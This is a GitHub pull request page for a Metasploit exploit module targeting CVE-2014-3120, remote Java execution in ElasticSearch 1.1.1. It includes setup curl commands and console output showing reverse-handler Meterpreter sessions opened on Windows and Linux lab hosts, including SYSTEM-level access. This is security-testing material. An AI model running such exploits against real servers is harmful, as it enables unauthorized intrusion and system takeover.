Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2014-3120 #3397

Merged
merged 1 commit into from May 29, 2014
Merged

Add module for CVE-2014-3120 #3397

merged 1 commit into from May 29, 2014

Conversation

jvazquez-r7
Copy link
Contributor

Tested ok with ElasticSearch 1.1.1 on Windows and Linux.

Verification

juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
{"acknowledged":true}juan@ubuntu:~$
  • Add at least one document to the index
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
{"_index":"twitter","_type":"tweet","_id":"1","_version":1,"created":true}juan@ubuntu:~$
  • Run the module like in the demo, hopefully enjoy sessions

DEMO

  • Windows
msf exploit(script_mvel_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.157:9200 - Trying to execute arbitrary Java..
[*] 172.16.158.157:9200 - Asking remote OS...
[+] 172.16.158.157:9200 - OS Windows XP found
[*] 172.16.158.157:9200 - Asking TEMP path
[+] 172.16.158.157:9200 - TEMP path found on C:\WINDOWS\TEMP\
[*] Sending stage (30355 bytes) to 172.16.158.157
[*] Meterpreter session 14 opened (172.16.158.1:4444 -> 172.16.158.157:1954) at 2014-05-27 17:59:01 -0500
[!] This exploit may require manual cleanup of: C:\WINDOWS\TEMP\DpFVdq.jar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.157 - Meterpreter session 14 closed.  Reason: User exit
  • Linux
msf exploit(script_mvel_rce) > set rhost 172.16.158.159
rhost => 172.16.158.159
msf exploit(script_mvel_rce) > check
[+] 172.16.158.159:9200 - The target is vulnerable.
msf exploit(script_mvel_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.159:9200 - Trying to execute arbitrary Java..
[*] 172.16.158.159:9200 - Asking remote OS...
[+] 172.16.158.159:9200 - OS Linux found
[*] Sending stage (30355 bytes) to 172.16.158.159
[*] Meterpreter session 15 opened (172.16.158.1:4444 -> 172.16.158.159:46011) at 2014-05-27 17:59:46 -0500
[+] Deleted /tmp/sMenGK.jar

meterpreter > getuid
Server username: elasticsearch
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter > exit -y
[*] Shutting down Meterpreter...

@wchen-r7 wchen-r7 self-assigned this May 28, 2014
@wchen-r7 wchen-r7 merged commit 7a29ae5 into rapid7:master May 29, 2014
wchen-r7 added a commit that referenced this pull request May 29, 2014
@wchen-r7
Land #3397 - ElasticSearch Dynamic Script Arbitrary Java Execution
3a3d038
@jvazquez-r7 jvazquez-r7 deleted the elasticsearch_rce branch November 18, 2014 15:46
@jhart-r7 jhart-r7 mentioned this pull request Jan 9, 2015
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7